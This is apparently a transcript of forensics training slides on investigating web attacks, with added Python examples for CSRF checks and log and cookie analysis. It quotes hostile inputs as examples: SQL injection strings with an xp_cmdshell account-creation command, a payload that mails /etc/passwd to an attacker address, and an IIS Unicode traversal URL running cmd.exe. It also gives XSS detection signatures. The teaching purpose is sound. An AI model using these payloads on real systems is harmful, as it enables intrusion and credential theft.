Transcript

  • 1. Module XXX – Investigating Web Attacks
  • 2. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited News: Web Application Hacks - Upping The Arms Race Source: http://www.informationweek.com/
  • 3. News: Mystery Web Attack Hijacks Your Clipboard. Source: http://www.theregister.co.uk/
  • 4. News: Georgian Web Attacks are the Work of Kids. Source: http://www.theinquirer.net/
  • 5. Scenario: Three Russian citizens were charged with extorting money from U.K. e-commerce companies on October 4, 2006. Ivan Maksakov, Alexander Petrov, and Denis Stepanov were accused of receiving $4 million from UK firms. The trio concentrated on U.K. Internet gambling sites, collecting information about British web casinos and bookmakers' offices using spy software designed by one of the members, and then demanded ransoms from the owners of those websites by threatening them with denial-of-service attacks. In six months of activity, the accused attacked over 54 web servers in 30 different countries. The U.K. National Hi-Tech Crime Unit (NHTCU) and the Russian authorities investigated the case and arrested them.
  • 6. Case Study: Word Flaw Hit With Zero-Day Attack
  • 7. Module Objective. This module will familiarize you with:
    • Indications of a Web Attack
    • Types of Web Attacks
    • Overview of Web Logs
    • Investigation of Web Attacks
    • Investigation of FTP Servers
    • Investigation of IIS Logs
    • Investigation of Web Attacks in Windows-based Servers
    • Web Page Defacement
    • Investigation of DNS Poisoning
    • Investigation of Static and Dynamic IP Addresses
    • Checklist for Security against Web Attacks
    • Tools for Web Attack Investigations
  • 8. Module Flow: Indications of a Web Attack → Types of Web Attacks → Overview of Web Logs → Investigation of Web Attacks → Investigation of FTP Servers → Investigation of IIS Logs → Investigation of Web Attacks in Windows-based Servers → Web Page Defacement → Investigation of DNS Poisoning → Investigation of Static and Dynamic IP Addresses → Checklist for Security against Web Attacks → Tools for Web Attack Investigations
  • 9. Indications of a Web Attack:
    • Customers reporting to an organization that they are not able to access its online service
    • A legitimate web page being redirected to an unknown website
    • Frequent rebooting of the server
    • Anomalies found in the log files
  • 10. Types of Web Attacks:
    • Cross-Site Scripting (XSS) Attack
    • Cross-Site Request Forgery (CSRF)
    • SQL Injection
    • Code Injection
    • Command Injection
    • Parameter Tampering
    • Cookie Poisoning
    • Buffer Overflow
    • Cookie Snooping
  • 11. Types of Web Attacks (cont'd):
    • DMZ Protocol Attack
    • Zero Day Attack
    • Authentication Hijacking
    • Log Tampering
    • Web Services Attack
    • Directory Traversal
    • Cryptographic Interception
    • URL Interpretation
    • Impersonation Attack
  • 12. Cross-Site Scripting (XSS). Cross-site scripting (XSS or CSS) is an application-layer hacking technique. It occurs when a dynamic web page collects malicious data from a user and displays the input on the page without it being properly validated. Cross-site scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page and trick the user into executing the script on his machine in order to gather data. The use of XSS might compromise private information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on end-user systems.
  • 13. Investigating Cross-Site Scripting (XSS). Regular expression for a simple CSS attack: /((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)/ix. It checks for attacks that may contain HTML opening and closing tags (<>) with any text inside, and their hex equivalents:
    • ((%3C)|<) - check for the opening angle bracket or its hex equivalent
    • ((%2F)|/)* - the forward slash of a closing tag or its hex equivalent
    • [a-z0-9%]+ - check for an alphanumeric string inside the tag, or the hex representation of one
    • ((%3E)|>) - check for the closing angle bracket or its hex equivalent
    Snort signature: alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"NII Cross-site scripting attempt"; flow:to_server,established; pcre:"/((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)/i"; classtype:web-application-attack; sid:9000; rev:5;)
  • 14. Investigating Cross-Site Scripting (XSS) (cont'd). Regular expression for an "<img src" CSS attack: /((%3C)|<)((%69)|i|(%49))((%6D)|m|(%4D))((%67)|g|(%47))[^\n]+((%3E)|>)/i
    • ((%3C)|<) - checks for the opening angled bracket or its hex equivalent
    • ((%69)|i|(%49))((%6D)|m|(%4D))((%67)|g|(%47)) - checks for the letters 'img' in varying combinations of ASCII, or upper- or lower-case hex equivalents
    • [^\n]+ - checks for any character other than a newline following the <img
    • ((%3E)|>) - the closing angled bracket or its hex equivalent
    Paranoid regex for CSS attacks: /((%3C)|<)[^\n]+((%3E)|>)/i
    • It simply looks for the opening HTML tag, or its hex equivalent, followed by one or more characters other than a newline, and then the closing tag or its hex equivalent
  • 15. Cross-Site Request Forgery (CSRF). The attacker forces the victim to submit the attacker's form data to the victim's web server. The attacker takes an arbitrary action as soon as the victim takes preventive measures against the web site. It targets the images that are generally found on Internet forums. It can:
    • Exploit a site's trust in a user
    • Involve sites that rely on the user's identity
    • Trick a user into sending HTTP requests to a site
    • Involve HTTP requests that have side effects
  • 16. Anatomy of a CSRF Attack:
    • Step 1: The attacker hosts a web page with pre-populated HTML form data
    • Step 2: The victim browses the attacker's HTML form
    • Step 3: The web page automatically submits the pre-populated form data to a site where the victim has access
    • Step 4: The site authenticates the request (carrying the attacker's form data) as coming from the victim
    • Result: The attacker's form data is accepted by the server since it was sent from a legitimate user
  • 17. Pen-Testing CSRF Validation Fields:
    • Test 1: Verify that the validation field is unique for each user
    • Test 2: Verify that the validation field cannot be determined by other users. If an attacker can create the same validation field for another user, there is no value in the validation field. The validation field must be unique for each site
    • Test 3: Verify that the validation field is never sent on the query string, since this data could be leaked to an attacker in places like the HTTP referrer
    • Test 4: Verify that the request fails when the validation field is missing
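A validation-field implementation that would pass the four tests above, as an added example that is not part of the module; the CsrfGuard class, the csrf_token field name and the run_pentest_checks helper are assumed names.

```python
import hmac
import secrets


class CsrfGuard:
    """Server-side anti-CSRF validation field, one per authenticated session.

    Assumed design (not the module's code): the field is random, bound to the
    session, accepted only from the request body, and required on every
    state-changing request.
    """

    SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}

    def __init__(self):
        self._tokens = {}  # session_id -> validation field

    def issue(self, session_id):
        # 32 random bytes from the OS CSPRNG: unique per session and not
        # derivable by another user (Tests 1 and 2).
        token = secrets.token_urlsafe(32)
        self._tokens[session_id] = token
        return token

    def validate(self, session_id, method, query, form):
        """Return True only if a state-changing request carries the right field."""
        if method.upper() in self.SAFE_METHODS:
            return True  # safe methods must not change state, so no field is needed
        if "csrf_token" in query:
            return False  # Test 3: never accept the field from the query string
        supplied = form.get("csrf_token")
        expected = self._tokens.get(session_id)
        if supplied is None or expected is None:
            return False  # Test 4: a missing field (or unknown session) fails
        # Constant-time comparison so the check itself leaks nothing about the value
        return hmac.compare_digest(supplied, expected)


def run_pentest_checks(guard):
    """Exercise the four tests from the module against a CsrfGuard instance."""
    tok_a = guard.issue("session-A")
    tok_b = guard.issue("session-B")
    return {
        "test1_unique_per_user": tok_a != tok_b,
        "test2_other_users_field_rejected":
            not guard.validate("session-B", "POST", {}, {"csrf_token": tok_a}),
        "test3_query_string_rejected":
            not guard.validate("session-A", "POST", {"csrf_token": tok_a}, {}),
        "test4_missing_field_fails":
            not guard.validate("session-A", "POST", {}, {"comment": "hi"}),
        "valid_request_accepted":
            guard.validate("session-A", "POST", {}, {"csrf_token": tok_a}),
    }


if __name__ == "__main__":
    for check, passed in run_pentest_checks(CsrfGuard()).items():
        print(f"{check:<36} {'PASS' if passed else 'FAIL'}")
```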
  • 18. SQL Injection Attacks. SQL injection is a type of security exploit in which the attacker adds SQL code to a web form input box to gain access to the database resources. For example, in a search page, the developer may execute a query (VBScript/ASP) using the code:
    • Set myRecordset = myConnection.execute("SELECT * FROM myTable WHERE someText ='" & request.form("inputdata") & "'")
    If an input such as blah' or 1=1 -- is entered in the search page, the ASP code builds and executes the statement:
    • SELECT * FROM myTable WHERE someText ='blah' or 1=1 --'
    • The WHERE clause of this statement is always true, so the query returns the whole recordset
  • 19. Investigating SQL Injection Attacks. Look for SQL injection attack incidents in these locations:
    • IDS log files
    • Database server log files
    • Web server log files
    The attack signature may look like:
    • 12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah' or 1=1 --
    • 12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah' or )1=1 (--
    • 12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah' or exec master..xp_cmdshell 'net user test testpass --
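Detection logic for the XSS regular expressions from slides 13 and 14 and for the SQL injection log signatures shown above, run over constructed log lines. This is an added example, not the module's code; the sample log layout, the SQLI pattern and the function names are assumptions.

```python
import re
from urllib.parse import unquote

# The three XSS regular expressions from the module as Python patterns
# (case-insensitive; each matches the literal character or its hex form).
XSS_SIMPLE = re.compile(r"((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)", re.I)
XSS_IMG = re.compile(
    r"((%3C)|<)((%69)|i|(%49))((%6D)|m|(%4D))((%67)|g|(%47))[^\n]+((%3E)|>)", re.I)
XSS_PARANOID = re.compile(r"((%3C)|<)[^\n]+((%3E)|>)", re.I)

# SQL injection indicators modelled on the three signatures in the module
# (quote + boolean tautology, quote + comment terminator, xp_cmdshell).
# Assumed, heuristic patterns; not a complete SQL injection ruleset.
SQLI = re.compile(
    r"(?:'|%27)\s*(?:or|and)\s*[()]*\s*\w+\s*="  # blah' or 1=1  /  blah' or )1=1 (
    r"|(?:'|%27).*?--"                          # quote followed by a comment terminator
    r"|xp_cmdshell",                            # extended stored procedure call
    re.I)

SIGNATURES = [
    ("xss-simple", XSS_SIMPLE),
    ("xss-img", XSS_IMG),
    ("xss-paranoid", XSS_PARANOID),
    ("sqli", SQLI),
]


def classify_request(uri):
    """Return the names of the signatures that match a request URI.

    The URI is tested both as logged and after one round of URL decoding, so
    encodings the regexes do not enumerate themselves (e.g. %27 for ') are caught.
    """
    candidates = (uri, unquote(uri))
    return [name for name, rx in SIGNATURES if any(rx.search(c) for c in candidates)]


def scan_log(text):
    """Scan log lines laid out as: time client-ip method uri-stem uri-query.

    This layout is assumed for the constructed sample below; adapt the split
    to the real log format (W3C extended, CLF, ...) before use.
    """
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        parts = line.split(maxsplit=4)
        if len(parts) < 5:
            continue  # blank or malformed line
        time, ip, method, stem, query = parts
        uri = stem if query == "-" else f"{stem}?{query}"
        labels = classify_request(uri)
        if labels:
            hits.append({"line": lineno, "time": time, "ip": ip, "uri": uri, "labels": labels})
    return hits


# Constructed sample log, modelled on the entries shown in the module.
SAMPLE_LOG = """\
12:34:35 192.2.3.4 GET /login.asp username=blah%27%20or%201=1%20--
12:34:36 192.2.3.4 GET /login.asp username=blah%27%20or%20exec%20master..xp_cmdshell%20%27net%20user%20test%20testpass%27%20--
12:34:40 10.1.1.7 GET /search.asp q=%3Cscript%3Ealert(1)%3C/script%3E
12:34:41 10.1.1.7 GET /guestbook.asp msg=%3CIMG%20SRC=javascript:alert(1)%3E
12:35:02 10.1.1.9 GET /index.asp -
12:35:03 10.1.1.9 GET /images/logo.gif -
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']:>2} {hit['ip']:<12} {','.join(hit['labels']):<24} {hit['uri']}")
```

Note that the simple XSS regex does not fire on the <IMG ...> line (the space after the tag name breaks the [a-z0-9%]+ run), which is exactly why the module adds the separate img and paranoid patterns.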
  • 20. News: SQL Injection Attacks Against Databases Rise Sharply. Info-theft attempts up nearly 40-fold since beginning of year. Source: http://computerworld.com/
  • 21. Code Injection Attack. A code injection attack is similar to an SQL injection, but instead of SQL commands, attackers pass other types of malicious code, such as PHP script and shell commands, to the web form input box of an application. The purpose of the injected code is to bypass or modify the intended functionality of the program. In this attack, arbitrary code is executed on the target server.
    • Example: A web server has a "guest book" script which receives small messages like "It is a nice site!"
    • An attacker may instead insert the message "; cat /etc/passwd | mail attacker@attacker.com #", which reads the password file from the web server and e-mails it to the attacker
  • 22. Investigating Code Injection Attacks. An executable-instruction detector in an Intrusion Detection System (IDS), together with a series of sandbox execution environments provided by the operating systems in the network, is used to detect code injection attacks. The IDS identifies a series of executable instructions and sends the suspicious packet's payload to the execution environment matching the packet's destination. The proper execution environment is determined by examining the destination IP address of the incoming packet. The payload is executed in the corresponding monitored environment and a report containing the payload's OS resource usage is returned to the IDS. If the report contains evidence of resource usage, the IDS generates an alert; otherwise the packet is considered non-malicious.
  • 23. Parameter Tampering. Parameter tampering is a form of web attack where certain parameters in the URL entered by a user are changed during the exchange between the client and the web server without the user's authorization. By modifying the arguments (parameters) in the query, the attacker can navigate through the web and database servers and retrieve or modify their contents.
  • 24. Cookie Poisoning. Cookie poisoning attacks involve the modification of the contents of a cookie in order to steal a user's personal information. Cookies stored on the computer's hard drive maintain bits of information that allow web sites to authenticate the user's identity, speed up transactions, monitor behavior, and personalize web services. Stolen personal information is generally used for other malicious attacks such as identity theft and online fraud.
  • 25. Investigating Cookie Poisoning Attacks. Trace the cookie-set commands issued by the web server, and store information such as cookie name, cookie value, IP address, and the session to which that cookie was assigned. Intercept each HTTP request sent to the web server, retrieve the cookie information out of it, and check it against all stored cookies. A change in the contents of a cookie indicates that an attack has occurred. (Figure: the attacker sends an invalid cookie to the server.)
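The cookie-tracing procedure described above, as an added example that is not the module's code: cookies are recorded per session as the server issues them, and every later request is compared against that record. The CookieMonitor class, the sid session cookie and the sample addresses are assumptions.

```python
def parse_set_cookie(header):
    """Return (name, value) from a Set-Cookie header; attributes such as Path are ignored."""
    name, _, value = header.split(";", 1)[0].partition("=")
    return name.strip(), value.strip()


def parse_cookie_header(header):
    """Return {name: value} from a request Cookie header."""
    cookies = {}
    for part in header.split(";"):
        if "=" in part:
            name, _, value = part.partition("=")
            cookies[name.strip()] = value.strip()
    return cookies


class CookieMonitor:
    """Record cookies as the server issues them and compare each request against them.

    Assumed layout: the session is identified by the `sid` cookie, and the
    cookies issued for a session are stored with the client IP they went to.
    """

    def __init__(self, session_cookie="sid"):
        self.session_cookie = session_cookie
        self.issued = {}  # session id -> {"ip": client ip, "cookies": {name: value}}

    def record_response(self, client_ip, session_id, set_cookie_headers):
        """Trace the Set-Cookie headers of one response sent to a client."""
        entry = self.issued.setdefault(session_id, {"ip": client_ip, "cookies": {}})
        for header in set_cookie_headers:
            name, value = parse_set_cookie(header)
            entry["cookies"][name] = value

    def check_request(self, client_ip, cookie_header):
        """Return a list of findings for one request; an empty list means consistent."""
        seen = parse_cookie_header(cookie_header)
        sid = seen.get(self.session_cookie)
        if sid is None:
            return []  # no session cookie: nothing issued to compare against
        entry = self.issued.get(sid)
        if entry is None:
            return [f"unknown session {sid!r}: never issued by this server"]
        findings = []
        if client_ip != entry["ip"]:
            # A known session presented from another address: snooped/replayed cookie
            findings.append(f"session {sid!r} issued to {entry['ip']} but presented by {client_ip}")
        for name, value in seen.items():
            issued = entry["cookies"].get(name)
            if issued is None:
                findings.append(f"cookie {name!r} was never set by the server")
            elif issued != value:
                # The client changed a server-issued value: cookie poisoning
                findings.append(f"cookie {name!r} modified: issued {issued!r}, received {value!r}")
        return findings


if __name__ == "__main__":
    # Constructed exchange: one response sets two cookies, then four requests arrive.
    mon = CookieMonitor()
    mon.record_response("192.2.3.4", "s1", ["sid=s1; Path=/; HttpOnly", "role=user; Path=/"])
    for ip, hdr in [("192.2.3.4", "sid=s1; role=user"), ("192.2.3.4", "sid=s1; role=admin"),
                    ("10.0.0.3", "sid=s1; role=user"), ("10.0.0.3", "sid=zzz")]:
        print(f"{ip:<12} {hdr:<22} -> {mon.check_request(ip, hdr) or 'consistent'}")
```

The address comparison is a signal, not proof: clients behind NAT or on mobile networks change addresses legitimately, so treat it as a lead to corroborate with the server logs rather than a verdict.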
  • 26. Buffer Overflow/Cookie Snooping. Buffer overflow:
    • A buffer overflow is the result of writing more data into a buffer than the buffer can hold
    • In such attacks, the extra data may contain code designed to trigger specific actions, sending new instructions to the attacked computer that damage the user's files, change data, or disclose confidential information
    • Attackers attempt to overflow vulnerable backend servers with excess requests, and can often execute commands directly on the compromised server
    Cookie snooping:
    • The attacker decodes the user's credentials, logs on as an authorized user, and gains access to sensitive information
  • 27. Detecting Buffer Overflow. The Nebula (NEtwork-based BUffer overfLow Attack detection) technique detects buffer overflow attacks based solely on the observed traffic, without requiring any modifications to the end hosts. Nebula uses a generalized signature that can capture all known variants of buffer overflow attacks while reducing the number of false positives to a negligible level.
  • 28. DMZ Protocol Attack/Zero Day Attack:
    • DMZ protocol attack: Most web applications include protocols such as DNS and FTP; these protocols have many inherent vulnerabilities and are exploited to gain access to other critical applications
    • Zero day attack: It refers to exploits that take advantage of a newly discovered vulnerability in a program or operating system before the software developer finds a solution for that vulnerability
  • 29. Authentication Hijacking. Authentication prompts a user to supply the credentials that allow access to the application. Enforcing a consistent authentication policy across multiple and disparate applications can prove to be a real challenge. An authentication hijacking can lead to theft of service, session hijacking, and user impersonation.
  • 30. Investigating Authentication Hijacking. Check if the browser remembers the password (a common mistake many users make when selecting the 'remember password' option). Check whether the user failed to log off from the application.
  • 31. Log Tampering. Logs are kept to track the usage patterns of the application. Log tampering allows attackers to cover their tracks or alter web transaction records. Attackers try to delete logs, modify logs, change user information, or otherwise destroy evidence of an attack.
  • 32. Directory Traversal. Directory traversal occurs when the attacker is able to browse directories and files outside the normal application access. The attack exposes the directory structure of the application, and often of the underlying web server and operating system. The attacker can enumerate contents, access secure or restricted pages, gain confidential information, and locate the source code.
  • 33. Cryptographic Interception. Using cryptography, confidential messages can be securely exchanged between two parties. Encrypted traffic flowing through network firewalls and IDS systems is not inspected. The attacker takes advantage of a secure channel to exploit it more efficiently than an open channel.
  • 34. URL Interpretation and Impersonation Attack:
    • URL interpretation: A web server failing to parse a URL correctly is termed URL interpretation. Example: Unicode or superfluous decode attacks
    • Impersonation attack: An impersonation attack is one where an attacker spoofs web applications by pretending to be a legitimate user
  • 35. Overview of Web Logs. Log files come in handy in detecting web attacks. The source, nature, and time of the attack can be determined by analyzing the log files of the compromised system. Log files have HTTP status codes that are specific to the type of incident. Web servers that run IIS or Apache are prone to log file deletion by attackers who have access to the web server, as the log files are stored on the web server itself.
  • 36. Investigating Web Attacks:
    1. Analyze web server, FTP, and local system logs to confirm a web attack
    2. Check log file information with respect to time/time stamps, IP address, HTTP status code, and requested resource
    3. Identify the nature of the attack. Is it a DDoS attack, or an attack targeted just at you? Is someone trying to shut down your network altogether, or attempting to infiltrate individual machines?
    4. Localize the source
    5. Use your firewall and IDS logs to know where the attack is coming from (or came from!)
    6. This will help you identify whether the attack/penetration is coming from a compromised host on your network or from the outside world
  • 37. Investigating Web Attacks (cont'd):
    7. Block the attack
    8. Once you know where the attack is coming from, you can take action to stop it
    9. If you have identified specific machines that have been compromised, pull them from the network until you can disinfect them and return them to service
    10. If an attack or attempted attack is coming from outside, block access to the network from that IP address
    11. START YOUR INVESTIGATION from the IP address!
  • 38. Example of FTP Compromise. The attacker runs a port scan:
    #nmap -O 23.3.4.5 -p 21
    Starting nmap
    Interesting ports
    Port State Service
    21/tcp open ftp
    80/tcp open www
    Remote OS is Windows 2000
    The attacker then connects using ftp:
    ftp 23.3.4.5
    Connected to 23.3.4.5
    Username:administrator
    Password:
  • 39. Investigating FTP Logs. The FTP logs on Windows 2000 are stored in the directory:
    • C:\WINDOWS\system32\LogFiles\MSFTPSVC1
    (Screenshot of an FTP log.)
  • 40. Investigating FTP Servers. FTP server vulnerabilities allow an attacker to directly compromise the system hosting the FTP server. Direct compromise of an FTP server can be as simple as obtaining legitimate passwords by:
    • Social engineering
    • Brute-force guessing
    • Network sniffing
    Network and FTP logs provide valuable records that can serve as evidence.
  • 41. Investigating IIS Logs. IIS logs all visits in log files. The log files are located under %systemroot%\LogFiles. If proxies are not used, the client IP can be logged. This request lists the log files:
    • http://victim.com/scripts/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\Winnt\system32\Logfiles\W3SVC1
  • 42. Investigating Apache Logs. The Apache server has two logs, namely:
    • Error log: The Apache server saves diagnostic information and the error messages it encounters while processing requests. The default path of this file on Linux is /usr/local/apache/logs/error_log. It is an important piece of evidence from the investigator's point of view. Example entry: [Sat Dec 11 7:12:36 2004] [error] [client 202.116.1.3] Client sent malformed Host header
    • Access log: It contains the requests processed by the Apache server. By default, access logs are stored in the common log format. The default path of this file on Linux is /usr/local/apache/logs/access_log. Example entry: 202.116.1.3 - shilp [11/Dec/2004:6:23:13 -0500] "GET /apache_ft.gif HTTP/1.0" 200 1577
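An added parser for the common log format entry shown above, followed by the per-client check of time stamp, IP address, status code and requested resource that slide 36 (step 2) calls for. This is not the module's code; the ACCESS_LOG sample (which reuses the module's entry and the cmd.exe request from slide 41) and the function names are constructed.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Apache common log format: host ident authuser [date] "request" status bytes
CLF = re.compile(
    r'^(?P<ip>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$')

TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"  # e.g. 11/Dec/2004:6:23:13 -0500


def parse_clf(line):
    """Parse one access-log line into a dict, or return None if it is malformed."""
    m = CLF.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FORMAT)
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def parse_log(text):
    """Return (records, malformed_lines); malformed lines are kept for review."""
    records, malformed = [], []
    for line in text.splitlines():
        rec = parse_clf(line)
        if rec is None:
            malformed.append(line)
        else:
            records.append(rec)
    return records, malformed


def status_summary(records):
    """Count responses per client IP by status class (2xx, 3xx, 4xx, 5xx)."""
    summary = defaultdict(Counter)
    for rec in records:
        summary[rec["ip"]][f"{rec['status'] // 100}xx"] += 1
    return summary


def suspicious_clients(records, error_threshold=3):
    """Clients with at least `error_threshold` 4xx/5xx responses.

    A burst of errors from one address is the usual trace of probing for
    files and scripts that do not exist; the threshold is an assumed tuning knob.
    """
    summary = status_summary(records)
    return sorted(ip for ip, c in summary.items()
                  if c["4xx"] + c["5xx"] >= error_threshold)


# Constructed sample access log; the first line is the module's own example.
ACCESS_LOG = """\
202.116.1.3 - shilp [11/Dec/2004:6:23:13 -0500] "GET /apache_ft.gif HTTP/1.0" 200 1577
202.116.1.3 - shilp [11/Dec/2004:6:23:14 -0500] "GET /index.html HTTP/1.0" 200 4096
203.0.113.9 - - [11/Dec/2004:6:25:01 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 220
203.0.113.9 - - [11/Dec/2004:6:25:02 -0500] "GET /cgi-bin/phf HTTP/1.0" 404 211
203.0.113.9 - - [11/Dec/2004:6:25:03 -0500] "GET /admin/ HTTP/1.0" 403 199
203.0.113.9 - - [11/Dec/2004:6:25:04 -0500] "HEAD / HTTP/1.0" 200 -
malformed line that does not match the format
"""

if __name__ == "__main__":
    records, bad = parse_log(ACCESS_LOG)
    for ip, counts in status_summary(records).items():
        print(f"{ip:<14} {dict(counts)}")
    print("suspicious:", suspicious_clients(records))
    print("malformed lines:", len(bad))
```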
  • 43. Investigating Web Attacks in Windows-based Servers. Run the event viewer to look at the logs:
    • C:\> eventvwr.msc
    Look for a large number of failed logon attempts or locked-out accounts. Check if the following suspicious events have occurred:
    • Event log service stops
    • Windows File Protection is not active on the system
    • The MS Telnet Service started successfully
  • 44. Investigating Web Attacks in Windows-Based Servers (cont'd):
    • C:\> net view 127.0.0.1 - Look at file shares and ensure that each of them has a defined business purpose
    • C:\> net session - Look at who has an open session with the system
    • C:\> net use - Look at which sessions the machine has opened with other systems
    • C:\> nbtstat -S - Look at NetBIOS over TCP/IP activity
    • C:\> netstat -na - Look for unusual listening TCP and UDP ports
  • 45. Investigating Web Attacks in Windows-based Servers (cont'd):
    • C:\> at - Look for unusual scheduled tasks on the local host, such as tasks running as a user in the Administrators group or as SYSTEM
    • C:\> lusrmgr.msc - Look for new accounts in the Administrators group
    • Look for unexpected processes by running Task Manager
    • C:\> net start - Look for unusual network services
    • C:\> dir - Check file space usage to look for a sudden decrease in free space
  • 46. Web Page Defacement. Unauthorized modification of a web page leads to web page defacement. Attacking techniques:
    • The attacker convinces the legitimate user to perform an action (i.e., giving away credentials) that may help in the attack
    • Luring the legitimate user (insider) and gaining credentials
    • Exploiting implementation and design errors
  • 47. Web Page Defacement (cont'd). Web page defacement requires write access privileges in the web server root directory. The compromise could come from any security vulnerability such as Unicode and RPC. Web page defacements are the result of:
    • Weak administrator passwords
    • Application misconfiguration
    • Server misconfiguration
    • Accidental permission assignments
  • 48. Defacement Using DNS Compromise. The attacker can compromise the authoritative domain name server for the web server, redirecting DNS requests for the website to his defaced website:
    • Web server DNS entry: www.example.com 192.2.3.4
    • DNS entry after compromise by the attacker: www.example.com 10.0.0.3
    • Now all requests for www.example.com are redirected to 10.0.0.3
  • 49. Investigating DNS Poisoning. If you notice that the DNS cache has been corrupted, dump the contents of the DNS server's cache to look for inappropriate entries. On Linux systems, use the BIND command:
    • #ndc dumpdb
    • Database dump initiated
    You can enable DNS logging in named.conf, but it will slow down the performance of the DNS server.
  • 50. Intrusion Detection. Intrusion detection is the art of detecting inappropriate, incorrect, or anomalous activity. It can be used to determine if a computer network or server has experienced an unauthorized intrusion. Types of intrusion detection:
    • Host-based Intrusion Detection Systems (HIDS): IDS systems that operate on a host to detect malicious activity on that host
    • Network-based Intrusion Detection Systems (NIDS): IDS systems that operate on network data flows
    • Intrusion Prevention System (IPS): A system that actively monitors a network or host for attacks and prevents those attacks from occurring
  • 51. Strategies for Securing Web Applications:
    • Developing approaches for the detection of vulnerabilities
    • Fixing previously discovered vulnerabilities
    • Pen-testing the application, which saves the time otherwise spent researching vulnerabilities and analyzing results
    • Checking for security flaws through IDS and IPS tools
    • Improving awareness of good security
  • 52. Investigating Static and Dynamic IP Addresses. The static IP address of a particular host can be found with the help of tools such as NSlookup, Whois, Traceroute, ARIN, and NeoTrace. The DHCP server allocates dynamic IP addresses to the hosts on a network. The DHCP log file stores information regarding the IP address allocated to a particular host at a particular time.
  • 53. Checklist for Web Security:
    • Avoid user accounts having weak or no passwords
    • Block unused open ports
    • Check for various web attacks
    • Test whether the Unicode vulnerability is present
    • Check whether an IDS or IPS is deployed
    • Look for possible intrusion areas using a vulnerability scanner
    • Test the website to check whether it can handle large loads, and SSL if it is an e-commerce website
    • Document the list of techniques, devices, policies, or necessary steps that offer security
  • 54. Statistics 2005-2007
  • 55. Statistics 2005-2007 (cont'd)
  • 56. Statistics 2000-2007
  • 57. Dotdefender (http://www.applicure.com/). Dotdefender is a web application attack protection tool that blocks attacks manifested within the HTTP request logic, such as:
    • SQL Injection - dotDefender intercepts and blocks attempts to inject SQL statements that corrupt or gain access to corporate data
    • Proxy Takeover - dotDefender intercepts and blocks attempts to divert traffic to an unauthorized site
    • Cross-site Scripting - dotDefender intercepts and blocks attempts to inject malicious scripts that hijack the machines of subsequent site visitors
    • Header Tampering - dotDefender identifies and blocks requests containing corrupted header data
    • Path Traversal - dotDefender blocks attempts to navigate through the host's internal file system
    • Probes - dotDefender detects and blocks attempts to ferret out information about the system
    • Known Attacks - dotDefender recognizes and blocks attacks bearing known signatures
  • 58. Dotdefender (cont'd)
  • 59. AccessDiver (http://www.accessdiver.com)
  • 60. AccessDiver: Screenshot
  • 61. Log Analyzer: Server Log Analysis (http://www.w3.org/). Server log analysis analyzes server logs by changing numeric Internet node numbers into domain names with the help of httpd-analyse.c. httpd-analyse.c is the program that helps the server log analysis tool perform its function. Output:
    • A version of the log file with the document name simplified (if necessary)
    • IP addresses turned into DNS name form
  • 62. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Web Attack Investigation Tools Analog is a program which analyzes logfiles from WWW servers that can be installed directly on a virtual server Deep Log Analyzer is an advanced web analytics solution for small and medium size websites
  • 63. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Web Attack Investigation Tools (cont’d) AWStats is a free web analysis tool that works as a CGI script on the web server or from the command line that generates advanced web, streaming, ftp or mail server statistics, graphically WebLog Expert is an access log analyzer which gives the information about the site's visitors such as activity statistics, accessed files, and paths through the site, browsers
  • 64. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Web Attack Investigation Tools (cont’d) AlterWind Log Analyzer Professional is unique web log analysis software Webalizer is a web server log file analysis program that produces usage statistics in HTML format for viewing with a browser
  • 65. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Web Attack Investigation Tools (cont’d) eWebLog Analyzer is a web server log analyzer that gives you vital information about your website’s usage that can read log files of the most popular web servers, including Microsoft IIS, Apache, and NCSA N-Stealth 5 is a web vulnerability scanner that scans over 18000 HTTP security issues stealth HTTP Scanner writes scan results to an easy HTML report
  • 66. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Web Attack Investigation Tools (cont’d) Acunetix scans website simulating numerous hacking techniques such as SQL injection, cross site scripting, and Google hacking, in order to identify vulnerabilities in the website Falcove is used by website owners to see whether their websites are hackable or vulnerable to attacks and to find vulnerabilities before attackers do Security audit report will show severity of web vulnerabilities found
  • 67. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Web Attack Investigation Tools (cont’d) AppScan provides security testing throughout the application development lifecycle, which tests security assurance in the development stage Watchfire AppScan automates web application security audits to ensure the security and compliance of websites
  • 68. Web Attack Investigation Tools (cont’d) Emsa Web Monitor is a small web monitoring program that runs on the desktop and allows the user to monitor the uptime status of several websites. WebWatchBot is monitoring and analysis software for websites and IP devices, including Ping, HTTP, HTTPS, SMTP, POP3, FTP, Port, and DNS checks
